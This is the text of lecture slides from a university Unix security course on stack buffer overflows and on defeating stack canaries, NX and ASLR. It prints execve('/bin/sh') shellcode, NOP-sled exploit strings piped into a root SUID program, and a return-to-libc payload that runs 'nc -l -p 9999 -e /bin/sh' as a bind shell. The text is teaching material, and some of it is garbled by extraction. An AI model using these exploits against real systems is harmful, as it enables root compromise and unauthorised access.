Mahidol University

Master degree of
Cyber Security and Information Assurance

UNIX SECURITY
BATTLE OF
PROTECTIONS VS EXPLOITATIONS
Ammarit Thongthua
<ShellCodeNoobx Es>

AGENDA

Introduction
Vulnerable

Unix application
Memory Space and Stack Layout
Buffer Overflow
Unix application Reverse Engineer
ShellCode

Protection vs Expliotation
Basic

Stack without protection + Demo

Bypass password protection

Exploit to get root privilege

Limited

Stack Space + Demo

StackGuard (Canary) + Demo
Non-Executable-Stack (NX) + Demo
Address

Defeat with static system library (kernel < 2.6.20 ) + Demo

ASLR

Space Layout Randomization (ASLR)

with removed Static system library

Defeat with application wrapping (kernel >= 2.6.20 ) + Demo

VULNERABLE UNIX APPLICATION

Has permission root as user or group
SUID or SGID is set (Sting S at eXecute bit)

This

root

2 criteria provided privilege escalation to be

VULNERABLE UNIX APPLICATION

Use vulnerable input standard function

Ex:

strcp(), gets()
They make the program can possibly
segmentation fault (buffer overflow)

MEMORY ADDRESS AND STACK

LAYOUT

char pw[608];

MEMORY ADDRESS AND STACK

LAYOUT
0xFFFFFFFF

Stack

Heap
DSS Segment
Data Segment
Code Segment
0x00000000

Int i = 0;
Char pw[608];

MEMORY ADDRESS AND STACK

LAYOUT
..

0xFFFFFFFF

Previous Stacks

Stack

0x00000000

Int i = 0;

Main()

MEMORY ADDRESS AND STACK

LAYOUT
..

0xFFFFFFFF

Previous Stacks

Stack

Int i = 0;
RP
SFP
Char pw[608];

0x00000000

Main()

checkpw()

BUFFER OVERFLOW

The situation when the data that input to the

system is larger than the size of buffer that d
eclare to be used Ex: char pw[608];
AAAAAAAAAA....[607 of A].AAA\x00

SFP

RP

AAAAAAAAAA.[616 of A].AAAAAAAAAAAAAA\x00
SFP
SFP = 0x41414141
***RP = 0x41414141

Segmentation fault
Illegal Instruction

RP

BUFFER OVERFLOW

AAAAAAAAAAAAA.[612 of A].AAAAAAA 0x080484c7

SFP
SFP = 0x41414141
***RP = 0x080484c7

Segmentation fault
Illegal Instruction

RP

BUFFER OVERFLOW

BUFFER OVERFLOW

Demo #1
Bypass password protection

BUFFER OVERFLOW
Attacker can control return pointer to run Malicious
Machine OpCode that put to memory (Shell Code).
Insert shell code as a part of input to reduce the
complexity of exploitation

0xFBFF0544

[Malicious Machine OpCode] + [ PADDING ]

SFP
SFP = 0x41414141
***RP = 0xFBFF0544

0xFBFF0544

RP

SHELL CODE

Shell code is the code that attacker want the

system run in order to operate the command as
attacker need (create form assembly and conv
ert to OpCode
Ex;

Open port for connection to that system with root

privilege
Add user to the system
Run shell as root privilege

Shell code is written as Hexadecimal format

SHELL CODE
Assembly Code : execve(/bin/sh)

Op Code
31 c0
50
68 2f 2f 73
68 68 2f 62
69 6e
89
E3
50 53 89
e1 b0 0b
cd 80

Shell Code

SHELL CODE
RP

Vulnerability program
Run as root

execve(/bin/sh)

We get /bin/sh as root

SHELL CODE

Where can we get shell code use to make exploit. ?

Create

your own shell code (quite take time)

Use Metasploit to generate shell code

Metepreter

Search

from internet

shell-storm.org/shellcode
packetstormsecurity.com
www.exploit-db.com/exploits

SHELL CODE

Where is the shell code start location ?

Need

to reverse engineering and debug

EXPLOIT CODE
Exp = Shellcode + PAD + RP

0xBFFF520

612 bytes

4 bytes

[Shell Code] + [PADDING make size to 612 ]

SFP
SFP = 0x41414141
***RP = 0xBFFF520

0xBFFF520

RP

EXPLOIT CODE

Shellcode = \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
"\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80
RP = \x20\xf5\xff\xbf # 0xBFFF520
Exp = scode + `python c- print A*528 ` + RP
----------------------------------------------------------------------------------------------user@host:$ python exp.py | ./vul_app

EXPLOIT CODE

Sometime result of our exploit is crash !!!

What happen ?
[Shell Code] + [PADDING make size to 612 ]

0xBFFF520

EXPLOIT CODE

[ Shell Code ] + [ 577 Byte of PADDING ]

0xBFFF520

[400B. Landing space] +[Shell Code] + [177 B. PADDING ]0xBFFF540

NOP (\x90) = Do nothing

EXPLOIT CODE

Shellcode = \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
"\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80
RP = \x40\xf5\xff\xbf # 0xBFFF520
Exp = `python c- print \x90*400 `+ scode +`python c- print A*128
`+ RP
----------------------------------------------------------------------------------------------user@host:$ python exp.py | ./vul_app

EXPLOIT CODE

When exploit successfully

BASIC STACK WITHOUT PROTECTION

Demo #2
Exploit to get root privilege

LIMITED STACK SPACE

0xFBFFxxxx

If size of buffer is limited, we need to put

some shell code some where in stack and co
ntrol RP to run shell code
[ NOP Space (NOP Sledding) ] + [S h e l l C o d e ]

AAAAAAAAAAAAA[612 of A]AAAAAAAA 0xFBFFxxxx

SFP
SFP = 0x41414141
***RP = 0xBFFFxxxx ??? (We dont know yet)

RP

LIMITED STACK SPACE

***RP = 0xBFFFF7B0

LIMITED STACK SPACE

Shellcode = \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
"\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80
RP = \xb0\xf7\xff\xbf # 0xBFFF520
Exp =`python c- print A*612` + RP + =`python c- print \x90*400` +
scode

----------------------------------------------------------------------------------------------user@host:$ python exp.py | ./vul_app

LIMITED STACK SPACE

When exploit successfully

LIMITED STACK SPACE

Demo #3
Exploit to get root privilege
With Limited Stack Space

Mahidol University

Master degree of
Cyber Security and Information Assurance

UNIX SECURITY
BATTLE OF
PROTECTIONS VS EXPLOITATIONS
(CONTINUE)
Ammarit Thongthua
<ShellCodeNoobx Es>

LAST TIME

Introduction
Vulnerable

Unix application
Memory Space and Stack Layout
Buffer Overflow
Unix application Reverse Engineer
ShellCode

Protection vs Expliotation
Basic

Stack without protection + Demo

Bypass password protection

Exploit to get root privilege

Limited

Stack Space + Demo

SUMMARY
Bypass

password protection

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Buffer

RP

main()

Grant()

overflow to run shellcode to get root privilege

\x90\x90\x90 \x90\x90 + [Shell Code] + AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Buffer

RP

overflow to run shellcode with limited Stack Space

AAAAAAAAAAAAAAAAAAAAAAAAAA

RP

\x90 \x90\x90\x90\x90\x90\x90 + [Shell Code]

TODAY
Bypass

limited stack space by ret-2-libc

StackGuard (Canary) and Defeat
Non-Executable-Stack (NX) and Defeat
Address Space Layout Randomization (ASLR)

Defeat with static system library (kernel < 2.6.20 )

ASLR

with removed Static system library

Defeat with application wrapping (kernel >= 2.6.20 )

BYPASS LIMITED STACK SPACE BY RET-2LIBC

Characteristic of vulnerable program

Has

set SUID, GUID

Can Overflow
Use Libc.

BYPASS LIMITED STACK SPACE BY RET-2LIBC

Fool program to make system call with evil

command
nc

-l -p 9999 -e /bin/sh

AAAAAAAAAAAAA
SFP

system

Arg

RP

If Arg = nc -l -p 9999 -e /bin/sh and Program run as

root
So, nc l p 9999 e /bin/sh run as root

BYPASS LIMITED STACK SPACE BY RET-2LIBC

Find location of system call function

BYPASS LIMITED STACK SPACE BY RET-2LIBC

Create evil Argument as system global

variable

AAAAAAAAAAAAA
SFP

system

RP =

\xf0\x4e\xec\xb7

Arg

NC =

\x98\xfa\xff\xbf

BYPASS LIMITED STACK SPACE BY RET-2LIBC

Result

BYPASS LIMITED STACK SPACE BY RET-2-LIBC

When exploit successfully

STACK GUARD (CANARY)

Protection mechanism place in stack (8 byte) to
detect the overflow and preventing to control RP
Need to include when we compile program

gcc

-fstack-protector code.c -o myprogram

AAAAAAAAAAAAAAAAAAAA AAAA AAAA AAAA

Canary

SFP

RP

If canary overwritten the program will be terminated

Type of Canary

NULL

canary (0x00000000)
Terminator canary (0x00000aff 0x000aff0d)
Random canary (Unpredicted 4 byte)

STACK GUARD (CANARY) DEFEAT

For Null canary and Terminator canary can be

defeated by Canary repaired
NULL

canary only app use gets() function

AAAAAA00000000AAAA[RP] x90\x90\x90\x[Shellcode]\x0a
Terminator

canary (always 0x00000aff)

app use gets() function

app use strcpy() function and need more than 1 arg

Arg1= AAAAAAAAAA0affAAAA[RP] x90\x90\x90\x[Shellcode]00

BBBBBBBB00
CCCCCC00
Arg3=
AAAAAA00000affAAAA[RP] x90\x90\x90\x[Shellcode]
Arg2=

STACK GUARD (CANARY) DEFEAT

EXAMPLE

Find opportunity to exploit

STACK GUARD (CANARY) DEFEAT

EXAMPLE

Find opportunity to exploit

Canary value = 0x00000af

(It is a terminator canary ^_^)

STACK GUARD (CANARY) DEFEAT

EXAMPLE

Run exploit

ADDRESS SPACE LAYOUT

RANDOMIZATION (ASLR)

Technique use prevent an attacker jumping

to a particular exploited code in memory by
random the virtual address in every runtime.

ADDRESS SPACE LAYOUT

RANDOMIZATION (ASLR)
.

\x90\x90\x90 \x90\x90 + [Shell Code] + AAAAAAAAAAAAAAAAAAAAA

Random is 2

20

So, Possibility =1/2

20

or 0.000001

How can we increase possibility to jump to shell code ?

RP

ADDRESS SPACE LAYOUT

RANDOMIZATION (ASLR) DEFEAT MET
HOD

If OS kernel has some static lib. Use JMP ESP

instruction in that static lib to bring RP to she
ll code
esp

INC EAX

AAAAAAAAAAAAAAAAAAAAAAA RP /x90/x90/x90/x[ shell code ]

JMP ESP ADD EBS, EBP .

ADDRESS SPACE LAYOUT

RANDOMIZATION (ASLR) DEFEAT MET
HOD

If OS kernel has not static lib, need to write

application to call vulnerable application to li
mit random address space (App wrap up)

Check current ESP value

and Set
RP = ESP + [vul app bufer]
AAAAAAAAAAAAAAAAAAAAAAAAA
RP /x90/x90/x90/x90/x90/x90/x90/x90
/x90/x90/x90/x90/x90/x90/x90/x90/x90
/x90/x90/x90/x90/x[ shell code ]

ADDRESS SPACE LAYOUT

RANDOMIZATION (ASLR) DEFEAT MET
HOD

Wrap up app

ADDRESS SPACE LAYOUT

RANDOMIZATION (ASLR) DEFEAT MET
HOD

Result

SUMMARY
Bypass

limited stack space by ret-2-libc

StackGuard (Canary) and Defeat
Non-Executable-Stack (NX) and Defeat
Address Space Layout Randomization (ASLR)

Defeat with static system library (kernel < 2.6.20 )

ASLR

with removed Static system library

Defeat with application wrapping (kernel >= 2.6.20 )

REFERENCE
Protecting Against Address Space Layou
Randomization (ASLR) Compromises and Ret
urn-to-Libc Attacks Using Network Intrusion D
etection Systems. David J. Day, Zheng-Xu Zh
ao, November 2011, Volume 8, Issue 4, pp 47
2-483
Cowan, C. Buffer Overflow Attacks.
StackGuard:Automatic Adaptive Detection an
d Prevention of Buffer-Overflow Attacks. 1 O
ctober 2008.
Defeating PaX ASLR protection. Durden, T.
59, s.l. :Phrack, 2002, Vol. 12.